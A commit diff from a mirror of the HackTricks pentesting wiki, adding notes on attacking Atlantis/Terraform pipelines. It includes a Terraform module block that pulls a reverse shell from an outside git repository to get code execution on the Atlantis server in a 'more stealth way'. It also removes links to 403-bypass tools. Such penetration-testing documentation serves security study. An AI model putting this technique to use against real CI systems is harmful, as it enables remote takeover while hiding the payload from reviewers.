mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [#3117] No subject
This commit is contained in:
parent
18d818db2f
commit
e7ccfd30d5
2 changed files with 12 additions and 6 deletions
|
@ -189,6 +189,16 @@ data "external" "example" {
|
|||
}
|
||||
```
|
||||
|
||||
You can perform this attack even in a **more stealth way**, instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
|
||||
|
||||
```javascript
|
||||
module "not_rev_shell" {
|
||||
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
|
||||
}
|
||||
```
|
||||
|
||||
You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules)
|
||||
|
||||
### Atlantis apply RCE - Config modification in new PR
|
||||
|
||||
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
|
||||
|
@ -219,6 +229,8 @@ resource "null_resource" "rev_shell" {
|
|||
}
|
||||
```
|
||||
|
||||
As in the previous exploitation technique you could probably **load an external resource instead of writing the malicious payload** directly in the terraform file.
|
||||
|
||||
### Terraform Param Injection
|
||||
|
||||
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
|
||||
|
|
|
@ -91,9 +91,3 @@ If _/path_ is blocked:
|
|||
guest guest
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## Automatic Tools
|
||||
|
||||
* [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
|
||||
* [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
|
||||
* [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)
|
||||
|
|
Loading…
Reference in a new issue